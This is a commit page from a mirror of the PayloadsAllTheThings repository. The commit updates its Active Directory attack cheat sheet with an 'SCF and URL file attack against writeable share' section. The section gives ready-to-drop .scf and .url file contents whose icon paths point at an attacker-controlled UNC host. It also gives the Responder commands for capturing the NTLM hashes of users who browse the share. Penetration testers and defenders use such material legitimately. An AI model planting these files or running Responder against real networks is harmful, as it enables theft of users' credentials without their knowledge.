ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

.url file in writeable share

Browse Source
This commit is contained in:
Swissky 2019-11-14 23:54:57 +01:00
parent 3a384c34aa
commit 639dc9faec
1 changed files with 13 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
Methodology and Resources/Active Directory Attack.md
View File

@ -264,9 +264,9 @@ smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder
``` ```
### SCF file attack against writeable share ### SCF and URL file attack against writeable share
Drop the following `something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0` Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
```powershell ```powershell
[Shell] [Shell]
@ -276,6 +276,17 @@ IconFile=\\10.10.XX.XX\Share\test.ico
Command=ToggleDesktop Command=ToggleDesktop
``` ```
This attack also works with `.url` files and `responder -I eth0 -v`.
```powershell
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.1.29\%USERNAME%.icon
IconIndex=1
```
### GPO - Pivoting with Local Admin & Passwords in SYSVOL ### GPO - Pivoting with Local Admin & Passwords in SYSVOL
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local